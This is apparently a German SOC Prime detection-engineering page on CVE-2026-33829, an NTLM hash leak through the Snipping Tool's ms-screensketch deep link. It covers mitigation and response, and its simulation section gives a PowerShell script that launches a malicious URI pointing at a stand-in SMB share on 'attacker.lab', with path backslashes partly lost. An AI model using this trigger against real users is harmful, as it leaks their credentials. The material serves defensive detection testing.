SOC Prime Bias: Kritisch

21 Apr 2026 15:30 UTC

CVE-2026-33829: NTLM-Leck im Snipping Tool

Author Photo
SOC Prime Team linkedin icon Folgen
CVE-2026-33829: NTLM-Leck im Snipping Tool
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine Sicherheitslücke im Windows Snipping Tool kann Net-NTLM-Hashes vom aktuell angemeldeten Benutzer an einen entfernten Angreifer freigeben. Das Problem wird durch einen bösartigen Deep Link ausgelöst, der den ms-screensketch URI-Schema missbraucht und Snipping Tool dazu bringt, eine auf einem vom Angreifer kontrollierten SMB-Share gehostete Datei zu öffnen. Obwohl das Opfer den manipulierten Link anklicken oder öffnen muss, erfolgt das Leck der Anmeldedaten im Hintergrund lautlos, wenn Windows die SMB-Verbindung initiiert. Dieses Verhalten kann Angreifern Zugang zu NTLM-Challenge-Response-Daten verschaffen, ohne dass der Benutzer eine sichtbare Warnung erhält.

Untersuchung

Forscher fanden heraus, dass das ms-screensketch Protokoll einen filePath Parameter akzeptiert und nicht richtig einschränkt, dass beliebige UNC-Pfade verwendet werden. Wenn Snipping Tool versucht, auf einen solchen Pfad zuzugreifen, versucht Windows automatisch, sich beim entfernten SMB-Server zu authentifizieren, wodurch die NTLM-Antwort freigegeben wird. Um das Problem zu validieren, erstellten die Forscher Proof-of-Concept-Skripte, die einen SMB-Listener starteten und eine bösartige URI generierten, die in der Lage ist, den geleakten Hash aufzufangen.

Abschwächung

Microsoft hat am 14. April 2026 ein Sicherheitsupdate veröffentlicht, um das Problem zu beheben, indem das anfällige Deep Link-Verhalten aus dem Snipping Tool entfernt wurde. Durch die Anwendung dieses Patches wird verhindert, dass die Anwendung automatisch von Angreifern bereitgestellte SMB-Pfade über nicht vertrauenswürdige URIs öffnet. Organisationen sollten die Bereitstellung des Updates auf betroffenen Windows-Systemen priorisieren, um die Exposition zu beseitigen.

Reaktion

Verteidiger sollten Versuche überwachen, das ms-screensketch URI-Schema aufzurufen und auf ausgehende SMB-Verbindungen zu ungewöhnlichen internen oder externen Hosts achten. Systeme, die das Snipping Tool nicht benötigen, sollten das Protokoll soweit möglich einschränken, und die Bereitstellung des Patches sollte ohne Verzögerung durchgesetzt werden. Jegliche exponierten NTLM-Hashes sollten umgehend auf Anzeichen von Replay, Relay oder anderem Missbrauch untersucht werden.

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorabcheck muss erfolgreich bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:

    Ein Angreifer hat sich Zugang zu der Opferarbeitsstation verschafft und möchte NTLM-Hashes ermitteln, ohne Verdacht zu erregen. Ausnutzung der CVE-2026-33829, erstellt der Angreifer eine bösartige ms-screensketch: URI, die auf einen vom Angreifer kontrollierten SMB-Share verweist (\attacker.labsharepayload.png). Wenn das Snipping Tool diese URI verarbeitet, initiiert Windows automatisch eine SMB-Verbindung zum entfernten Server und leakt die NTLM-Antwort der Maschine. Der Angreifer führt die URI über PowerShell aus, um sicherzustellen, dass das Snipping Tool im Benutzerkontext aufgerufen wird.

  • Regressions-Testskript:

    # NTLM-Leck durch Snipping Tool – Auslösesskript
    # Passen Sie den UNC-Pfad so an, dass er auf Ihren kontrollierten Listener verweist.
    $attackerServer = "attacker.lab"
    $sharePath      = "sharepayload.png"
    $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath"
    
    Write-Host "Snipping Tool mit bösartiger URI aufrufen ..."
    Start-Process $uri
    
    # Warten Sie ein paar Sekunden, bis der SMB-Handschlag abgeschlossen ist
    Start-Sleep -Seconds 5
    
    Write-Host "Aufruf abgeschlossen. Überprüfen Sie SIEM auf EventID 3 mit DestinationHostname, das '$attackerServer' enthält."
  • Bereinigungsbefehle:

    # Entfernen Sie alle verbleibenden Snipping Tool-Prozesse (falls noch laufend)
    Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue |
      Stop-Process -Force
    
    # Optional: Löschen Sie temporäre Dateien, die auf der Angreiferseite erstellt wurden (falls vorhanden)
    # (Setzt voraus, dass Sie Schreibzugriff auf den Share haben)
    # Remove-Item -Path "\$attackerServer$sharePath" -Force